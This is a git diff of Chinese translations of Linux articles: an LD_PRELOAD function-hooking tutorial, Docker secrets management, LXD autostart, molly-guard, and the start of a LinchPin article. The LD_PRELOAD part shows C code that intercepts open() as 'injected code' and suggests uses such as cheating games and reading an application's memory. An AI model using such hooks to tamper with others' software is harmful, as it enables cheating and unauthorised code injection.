正如你看到的输出那样,它列出了被程序 `random_nums` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的精确的输出可能与示例有所不同,但是,一个 **libc.so** 肯定是有的 – 这个文件提供了核心的 C 函数。它包含了 “真正的” rand()。
|
||||
|
||||
我使用下列的命令可以得到一个全部的函数列表,我们看一看 libc 提供了哪些函数:
|
||||
|
||||
> ```
|
||||
> nm -D /lib/libc.so.6
|
||||
> ```
|
||||
|
||||
这个 _nm_ 命令列出了在一个二进制文件中找到的符号。-D 标志告诉它去查找动态符号,因此 libc.so.6 是一个动态库。这个输出是很长的,但它确实在很多的其它标准函数中列出了 rand()。
|
||||
|
||||
现在,在我们设置了环境变量 LD_PRELOAD 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 _unrandom.so_,尽管程序本身并没有这样去要求它。下列的命令可以看得出来:
|
||||
|
||||
> ```
|
||||
> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums
|
||||
> linux-vdso.so.1 => (0x00007fff369dc000)
|
||||
> /some/path/to/unrandom.so (0x00007f262b439000)
|
||||
> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000)
|
||||
> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000)
|
||||
> ```
|
||||
|
||||
注意,它列出了我们当前的库。实际上这就是代码为什么被运行的原因:`random_num` 调用了 rand(),但是,如果 `unrandom.so` 被加载,它调用的是我们提供的实现了 rand() 的库。很清楚吧,不是吗?
|
||||
|
||||
#### 更清楚地了解
|
||||
|
||||
这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够使用函数正常工作。如果我们使用一个简单的 “return 0” 去实现 open() 你就明白了。我们看到这个应用程序就像发生了故障一样。这是 **显而易见的**, 真实地去调用原始的 open:
|
||||
|
||||
inspect_open.c:
|
||||
```
|
||||
int open(const char *pathname, int flags){
|
||||
/* Some evil injected code goes here. */
|
||||
return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so
|
||||
}
|
||||
```
|
||||
|
||||
嗯,不完全是。这将去调用 “原始的” open(…)。显然,这是一个无休止的回归调用。
|
||||
|
||||
怎么去访问这个 “真正的” open 函数呢?它需要去使用程序接口进行动态链接。它听起来很简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么:
|
||||
|
||||
inspect_open.c:
|
||||
|
||||
```
|
||||
#define _GNU_SOURCE
|
||||
#include <dlfcn.h>
|
||||
|
||||
typedef int (*orig_open_f_type)(const char *pathname, int flags);
|
||||
|
||||
int open(const char *pathname, int flags, ...)
|
||||
{
|
||||
/* Some evil injected code goes here. */
|
||||
|
||||
orig_open_f_type orig_open;
|
||||
orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open");
|
||||
return orig_open(pathname,flags);
|
||||
}
|
||||
```
|
||||
|
||||
_dlfcn.h_ 是被 _dlsym_ 函数所需要,我们在后面会用到它。那个奇怪的 _#define_ 是命令编译器去允许一些非标准的东西,我们需要它去启用 _dlfcn.h_ 中的 `RTLD_NEXT`。那个 typedef 只是创建了一个函数指针类型的别名,它的参数是原始的 open – 别名是 `orig_open_f_type`,我们将在后面用到它。
|
||||
|
||||
我们定制的 open(…) 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 open(…) 函数。为了得到那个函数的地址,我们请求 _dlsym_ 去为我们查找,接下来的 “open” 函数在动态库栈上。最后,我们调用了那个函数(传递了与我们的假冒 ”open" 一样的参数),并且返回它的返回值。
|
||||
|
||||
我使用下面的内容作为我的 “邪恶的注入代码”:
|
||||
|
||||
inspect_open.c (fragment):
|
||||
|
||||
```
|
||||
printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h!
|
||||
```
|
||||
|
||||
去完成它,我需要稍微调整一下编译参数:
|
||||
|
||||
> ```
|
||||
> gcc -shared -fPIC inspect_open.c -o inspect_open.so -ldl
|
||||
> ```
|
||||
|
||||
我增加了 _-ldl_ ,因此,它将共享库连接 _libdl_ ,它提供了 _dlsym_ 函数。(不,我还没有创建一个假冒版的 _dlsym_ ,不过这样更有趣)
|
||||
|
||||
因此,结果是什么呢?一个共享库,它实现了 open(…) 函数,除了它 _输出_ 文件路径以外,其它的表现和真正的 open(…) 函数 **一模一样**。:-)
|
||||
|
||||
如果这个强大的诀窍还没有说服你,是时候去尝试下面的这个示例了:
|
||||
|
||||
> ```
|
||||
> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator
|
||||
> ```
|
||||
|
||||
我鼓励你去看自己实验的结果,但是基本上,它实时列出了这个应用程序可以访问到的每个文件。
|
||||
|
||||
我相信它并不难去想像,为什么这可以用于去调试或者研究未知的应用程序。请注意,那只是部分的诀窍,并不是全部,因此 _open()_ 不仅是一个打开文件的函数 … 例如,在标准库中也有一个 _open64()_ ,并且为了完整地研究,你也需要为它去创建一个假冒的。
|
||||
|
||||
#### **可能的用法**
|
||||
|
||||
如果你一直跟着我享受上面的过程,让我推荐一个使用这个诀窍能做什么的一大堆创意。记住,你可以在不损害原始应用程序的同时做任何你想做的事情!
|
||||
|
||||
1. ~~获得 root 权限~~ 你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。)
|
||||
|
||||
2. 欺骗游戏:**取消随机化** 这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从`/dev/urandom` 中读取,或者,因此你可以通过使用一个修改的文件路径去运行原始的 `open()` 重定向它们到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来并不容易上手。
|
||||
|
||||
3. 欺骗游戏:**子弹时间** 实现所有的与标准时间有关的函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量正确地计算了新值,与时间相关的 `sleep` 函数、和其它的、受影响的应用程序将相信这个时间,(根据你的愿望)运行的更慢(或者更快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,让你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用&禁用慢进或者快进任何时间。
|
||||
|
||||
4. 研究应用程序:**列出访问的文件** 它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。
|
||||
|
||||
5. 研究应用程序:**监视因特网访问** 你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地获得控制应用程序基于 web 发送了什么,而不仅是看看,但是也会影响到数据的交换。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析&& 逆向工程使用闭源协议的应用程序。
|
||||
|
||||
6. 研究应用程序:**检查 GTK 结构** 为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们可以学习到一个应用程序使用的那些我们并不知道的玩意儿,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习怎么去做一些应用程序的接口管理,这个方法超级有用!
|
||||
|
||||
7. **在沙盒中运行不安全的应用程序** 如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /`或者一些其它的不希望的文件激活,你可以通过修改它传递到所有文件相关的函数(不仅是 _open_ ,它也可以删除目录),去重定向它所有的文件 I/O 到诸如 `/tmp` 这里。还有更难的如 chroot 的诀窍,但是它也给你提供更多的控制。它会和完全 “封装” 一样安全,并且除了你真正知道做了什么以外,这种方法不会真实的运行任何恶意软件。
|
||||
|
||||
8. **实现特性** [zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。
|
||||
|
||||
9. **修复 bugs** 另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype – 它是闭源的软件 – 从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。
|
||||
|
||||
10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作。LD_PRELOAD 不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问任何应用程序的内存,从本质上看,是因为它是通过应用程序自身来得以运行的。你可以在应用程序可以达到的范围之内通过修改它做任何的事情。你可以想像一下,它允许你做许多的低级别的侵入 … ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。
|
||||
|
||||
这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 – 通过下面的评论区共享出来吧!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/
|
||||
|
||||
作者:[Rafał Cieślak][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://rafalcieslak.wordpress.com/
|
||||
[1]:http://www.zlibc.linux.lu/index.html
|
||||
|
||||
|
@ -0,0 +1,111 @@
|
||||
|
||||
Dockers 涉密数据(Secrets) 管理介绍
|
||||
====================================
|
||||
|
||||
容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。
|
||||
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
|
||||
|
||||
构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据分发功能。
|
||||
|
||||
有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
|
||||
|
||||
### Docker 涉密数据(Secrets) 管理介绍
|
||||
|
||||
根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。
|
||||
|
||||
通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。
|
||||
|
||||
下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。
|
||||
|
||||
![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
|
||||
|
||||
在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密数据加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
|
||||
|
||||
```
|
||||
$ echo "This is a secret" | docker secret create my_secret_data -
|
||||
```
|
||||
|
||||
一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。
|
||||
|
||||
当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。
|
||||
|
||||
当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
|
||||
|
||||
```
|
||||
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
|
||||
```
|
||||
|
||||
未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/<secret_name>` 的内存文件系统中。
|
||||
|
||||
```
|
||||
$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets
|
||||
total 4
|
||||
-r--r--r-- 1 root root 17 Dec 13 22:48 my_secret_data
|
||||
```
|
||||
|
||||
如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。
|
||||
|
||||
```
|
||||
$ docker service update --secret-rm="my_secret_data" redis
|
||||
|
||||
$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data
|
||||
|
||||
cat: can't open '/run/secrets/my_secret_data': No such file or directory
|
||||
```
|
||||
|
||||
查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
|
||||
|
||||
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
|
||||
|
||||
[CLICK TO TWEET][6]
|
||||
|
||||
###
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1)
|
||||
|
||||
### 通过 Docker 更安全地使用应用程序
|
||||
|
||||
Docker 涉密数据旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密数据,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
|
||||
|
||||
更多相关学习资源:
|
||||
|
||||
* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7]
|
||||
|
||||
* [下载 Docker ][8] 且开始学习
|
||||
|
||||
* [在 Docker 数据中心尝试使用 secrets][9]
|
||||
|
||||
* [阅读文档][10]
|
||||
|
||||
* 参与 [即将进行的在线研讨会][11]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://blog.docker.com/2017/02/docker-secrets-management/
|
||||
|
||||
作者:[ Ying Li][a]
|
||||
译者:[HardworkFish](https://github.com/HardworkFish)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://blog.docker.com/author/yingli/
|
||||
[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20...
|
||||
[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management
|
||||
[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB
|
||||
[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management
|
||||
[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[7]:http://dockr.ly/AppSecurity
|
||||
[8]:https://www.docker.com/getdocker
|
||||
[9]:http://www.docker.com/trial
|
||||
[10]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[11]:http://www.docker.com/webinars
|
||||
[12]:https://blog.docker.com/author/yingli/
|
||||
[13]:https://blog.docker.com/tag/container-security/
|
||||
[14]:https://blog.docker.com/tag/docker-security/
|
||||
[15]:https://blog.docker.com/tag/secrets-management/
|
||||
[16]:https://blog.docker.com/tag/security/
|
||||
[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/
|
||||
[18]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[19]:https://lvh.io%29/
|
@ -0,0 +1,73 @@
|
||||
如何在 Linux 启动时自动启动 LXD 容器
|
||||
======
|
||||
我正在使用基于 LXD(“Linux 容器”)的虚拟机。如何在 Linux 系统中启动时自动启动 LXD 容器?
|
||||
|
||||
你可以在 LXD 启动后启动容器。你需要将 boot.autostart 设置为 true。你可以使用 boot.autostart.priority(默认值为 0)选项来定义启动容器的顺序(从最高开始)。你也可以使用 boot.autostart.delay(默认值0)选项定义在启动一个容器后等待几秒后启动另一个容器。
|
||||
|
||||
### 语法
|
||||
|
||||
上面讨论的关键字可以使用 lxc 工具用下面的语法来设置:
|
||||
|
||||
```
|
||||
$ lxc config set {vm-name} {key} {value}
|
||||
$ lxc config set {vm-name} boot.autostart {true|false}
|
||||
$ lxc config set {vm-name} boot.autostart.priority integer
|
||||
$ lxc config set {vm-name} boot.autostart.delay integer
|
||||
```
|
||||
|
||||
### 如何在 Ubuntu Linux 16.10 中让 LXD 容器在启动时启动?
|
||||
|
||||
输入以下命令:
|
||||
`$ lxc config set {vm-name} boot.autostart true`
|
||||
设置一个 LXD 容器名称 “nginx-vm” 以在启动时启动
|
||||
`$ lxc config set nginx-vm boot.autostart true`
|
||||
你可以使用以下语法验证设置:
|
||||
```
|
||||
$ lxc config get {vm-name} boot.autostart
|
||||
$ lxc config get nginx-vm boot.autostart
|
||||
```
|
||||
示例输出:
|
||||
```
|
||||
true
|
||||
```
|
||||
|
||||
你可以使用下面的语法在启动容器后等待 10 秒钟后启动另一个容器:
|
||||
`$ lxc config set nginx-vm boot.autostart.delay 10`
|
||||
最后,通过设置最高值来定义启动容器的顺序。确保 db_vm 容器首先启动,然后再启动 nginx_vm。
|
||||
```
|
||||
$ lxc config set db_vm boot.autostart.priority 100
|
||||
$ lxc config set nginx_vm boot.autostart.priority 99
|
||||
```
|
||||
使用[下面的 bash 循环在 Linux 上查看所有][1]值:
|
||||
```
|
||||
#!/bin/bash
|
||||
echo 'The current values of each vm boot parameters:'
|
||||
for c in db_vm nginx_vm memcache_vm
|
||||
do
|
||||
echo "*** VM: $c ***"
|
||||
for v in boot.autostart boot.autostart.priority boot.autostart.delay
|
||||
do
|
||||
echo "Key: $v => $(lxc config get $c $v) "
|
||||
done
|
||||
echo ""
|
||||
done
|
||||
```
|
||||
|
||||
|
||||
示例输出:
|
||||
![Fig.01: Get autostarting LXD containers values using a bash shell script][2]
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/how-to-auto-start-lxd-containers-at-boot-time-in-linux/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/faq/bash-for-loop/
|
||||
[2]:https://www.cyberciti.biz/media/new/faq/2017/02/Autostarting-LXD-containers-values.jpg
|
@ -0,0 +1,114 @@
|
||||
使用 molly-guard 保护你的 Linux/Unix 机器不会被错误地关机/重启
|
||||
======
|
||||
我去!又是这样。 我还以为我登录到家里的服务器呢。 结果 [重启的居然是数据库服务器 ][1]。 另外我也有时会在错误终端内输入 "[shutdown -h 0][2]" 命令。 我知道有些人 [经常会犯这个错误 ][3]。
|
||||
![我的愤怒无从容忍 ][4]
|
||||
有办法解决这个问题吗?我真的只能忍受这种随机重启和关机的痛苦吗? 虽说人总是要犯错的,但总不能一错再错吧。
|
||||
|
||||
最新我在 tweet 上发了一通牢骚:
|
||||
|
||||
> I seems to run into this stuff again and again :( Instead of typing:
|
||||
> sudo virsh reboot d1
|
||||
>
|
||||
> I just typed & rebooted my own box
|
||||
> sudo reboot d1
|
||||
>
|
||||
> -- nixCraft (@nixcraft) [February 19,2017][5]
|
||||
|
||||
|
||||
结果收到了一些建议。我们来试一下。
|
||||
|
||||
### 向你引荐 molly guard
|
||||
|
||||
Molly-Guard **尝试阻止你不小心关闭或重启 Linux 服务器**。它在 Debian/Ubuntu 中的包描述为:
|
||||
|
||||
> The package installs a shell script that overrides the existing shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* commands and first runs a set of scripts,which all have to exit successfully, before molly-guard invokes the real command。 One of the scripts checks for existing SSH sessions。 If any of the four commands are called interactively over an SSH session, the shell script prompts you to enter the name of the host you wish to shut down。 This should adequately prevent you from accidental shutdowns and reboots。
|
||||
|
||||
貌似 [molly-guard][6] 还是个专有名词:
|
||||
|
||||
> A shield to prevent tripping of some Big Red Switch by clumsy or ignorant hands。Originally used of the plexiglass covers improvised for the BRS on an IBM 4341 after a programmer's toddler daughter (named Molly) frobbed it twice in one day。 Later generalized to covers over stop/reset switches on disk drives and networking equipment。 In hardware catalogues, you'll see the much less interesting description "guarded button"。
|
||||
|
||||
### 如何安装 molly guard
|
||||
|
||||
使用 [apt-get command][7] 或者 [apt command][8] 来搜索并安装 molly-guard:
|
||||
```
|
||||
$ apt search molly-guard
|
||||
$ sudo apt-get install molly-guard
|
||||
```
|
||||
结果为:
|
||||
[![Fig.01: Installing molly guard on Linux][9]][10]
|
||||
|
||||
### 测试一下
|
||||
|
||||
输入 [reboot 命令 ][11] 和 shutdown 命令:
|
||||
```
|
||||
$ sudo reboot
|
||||
# reboot
|
||||
$ shutdown -h 0
|
||||
# sudo shutdown -h 0
|
||||
### running wrong command such as follows instead of
|
||||
### sudo virsh reboot vm_name_here
|
||||
$ sudo reboot vm_name_here
|
||||
```
|
||||
结果为:
|
||||
![Fig.02: Molly guard saved my butt ;\)][12]
|
||||
我超级喜欢 molly-guard。因此我将下行内容加入到 apt-debian-ubuntu-common.yml 文件中了:
|
||||
```
|
||||
- apt:
|
||||
name: molly-guard
|
||||
|
||||
```
|
||||
|
||||
是的。我使用 Ansible 在所有的 Debian 和 Ubuntu 服务器上都自动安装上它了。
|
||||
|
||||
**相关** : [My 10 UNIX Command Line Mistakes][13]
|
||||
|
||||
### 如果我的 Linux 发行版或者 Unix 系统(比如 FreeBSD) 没有 molly-guard 怎么办呢?
|
||||
|
||||
不用怕,[设置 shell 别名 ][14]:
|
||||
```
|
||||
## bash shell example ###
|
||||
alias reboot = "echo 'Are you sure?' If so, run /sbin/reboot"
|
||||
alias shutdown = "echo 'Are you sure?' If so, run /sbin/shutdown"
|
||||
```
|
||||
|
||||
你也可以 [临时取消别名机制运行真正的命令 ][15]。比如要运行 reboot 可以这样:
|
||||
```
|
||||
# \reboot
|
||||
```
|
||||
或者
|
||||
```
|
||||
# /sbin/reboot
|
||||
```
|
||||
另外你也可以写一个 [shell/perl/python 脚本来调用这些命令并要求 ][16] 确认 reboot/halt/shutdown 的选项。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/faq/howto-reboot-linux/
|
||||
[2]:https://www.cyberciti.biz/faq/shutdown-linux-server/
|
||||
[3]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html (My 10 UNIX Command Line Mistakes)
|
||||
[4]:https://www.cyberciti.biz/media/new/cms/2017/02/anger.gif
|
||||
[5]:https://twitter.com/nixcraft/status/833320792880320513
|
||||
[6]:http://catb.org/~esr/jargon/html/M/molly-guard.html
|
||||
[7]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
|
||||
[8]://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
|
||||
[9]:https://www.cyberciti.biz/media/new/cms/2017/02/install-molly-guard-on-linux.jpg
|
||||
[10]:https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/attachment/install-molly-guard-on-linux/
|
||||
[11]:https://www.cyberciti.biz/faq/linux-reboot-command/ (See Linux/Unix reboot command examples for more info)
|
||||
[12]:https://www.cyberciti.biz/media/new/cms/2017/02/saved-my-butt.jpg
|
||||
[13]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html
|
||||
[14]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html
|
||||
[15]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
|
||||
[16]:https://github.com/kjetilho/clumsy_protect
|
||||
[17]:https://twitter.com/nixcraft
|
||||
[18]:https://facebook.com/nixcraft
|
||||
[19]:https://plus.google.com/+CybercitiBiz
|
@ -1,393 +0,0 @@
|
||||
LinchPin:一个使用 Ansible 的简化的编排工具
|
||||
============================================================
|
||||
|
||||
### 2016年开始的 LinchPin,现在已经拥有一个 Python API 和一个成长中的社区。
|
||||
|
||||
|
||||
![LinchPin 1.0:一个使用 Ansible 的成熟的混合云编排工具](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/toolbox-learn-draw-container-yearbook.png?itok=2XFy0htN "LinchPin 1.0: A maturing hybrid cloud orchestration tool using Ansible")
|
||||
>Image by : [Internet Archive Book Images][10]. Modified by Opensource.com. CC BY-SA 4.0
|
||||
|
||||
过去的一年里,[我的团队公布了][11] [LinchPin][12],一个使用 Ansible 的混合[云][13]编排工具。准备云资源从来没有这么容易或更快。Ansible 强力支持的 LinchPin,专注于简化,在用户指尖下,将有更多的可用云资源。在这篇文章中,我将介绍 LinchPin,并且去看看过去的 10 个月,有多少成熟的项目。
|
||||
|
||||
LinchPin 刚被引入的时候,使用 **ansible-playbook** 命令去运行 LinchPin ,虽然可以完成,但是还是很复杂的,LinchPin 现在有一个前端命令行用户界面(CLI),它是在 [Click][14] 中写的,而且它使 LinchPin 比以前更简单。
|
||||
|
||||
探索开源云
|
||||
|
||||
* [云是什么?][1]
|
||||
|
||||
* [OpenStack 是什么?][2]
|
||||
|
||||
* [Kubernetes 是什么?][3]
|
||||
|
||||
* [为什么操作系统对容器很重要?][4]
|
||||
|
||||
* [保持 Linux 容器的安全][5]
|
||||
|
||||
为了不落后于 CLI,LinchPin 现在也有一个 [Python][15] API,它可以被用于管理资源,比如,Amazon EC2 和 OpenStack 实例、网络、存储、安全组、等等。这个 API [文档][16] 可以在你想去尝试 LinchPin 的 Python API 时帮助你。
|
||||
|
||||
### Playbooks 作为一个库
|
||||
|
||||
因为 LinchPin 的核心 bits 是 [Ansible playbooks][17]、角色、模块、过滤器,以及任何被称为 Ansible 模块的东西都被移进 LinchPin 库中,这意味着我们可以直接调用 playbooks,但它不是资源管理的首选机制。**linchpin** 可执行文件已经成为命令行的事实上的前端。
|
||||
|
||||
### 深入了解命令行
|
||||
|
||||
让我们深入了解**linchpin**命令行:
|
||||
|
||||
```
|
||||
$ linchpin
|
||||
Usage: linchpin [OPTIONS] COMMAND [ARGS]...
|
||||
|
||||
linchpin: hybrid cloud orchestration
|
||||
|
||||
Options:
|
||||
-c, --config PATH Path to config file
|
||||
-w, --workspace PATH Use the specified workspace if the familiar Jenkins
|
||||
$WORKSPACE environment variable is not set
|
||||
-v, --verbose Enable verbose output
|
||||
--version Prints the version and exits
|
||||
--creds-path PATH Use the specified credentials path if WORKSPACE
|
||||
environment variable is not set
|
||||
-h, --help Show this message and exit.
|
||||
|
||||
Commands:
|
||||
init Initializes a linchpin project.
|
||||
up Provisions nodes from the given target(s) in...
|
||||
destroy Destroys nodes from the given target(s) in...
|
||||
```
|
||||
|
||||
你可以立即看到一个简单的描述,以及命令的选项和参数。这个帮助的最下面的三个命令是本文的重点内容。
|
||||
|
||||
### 配置
|
||||
|
||||
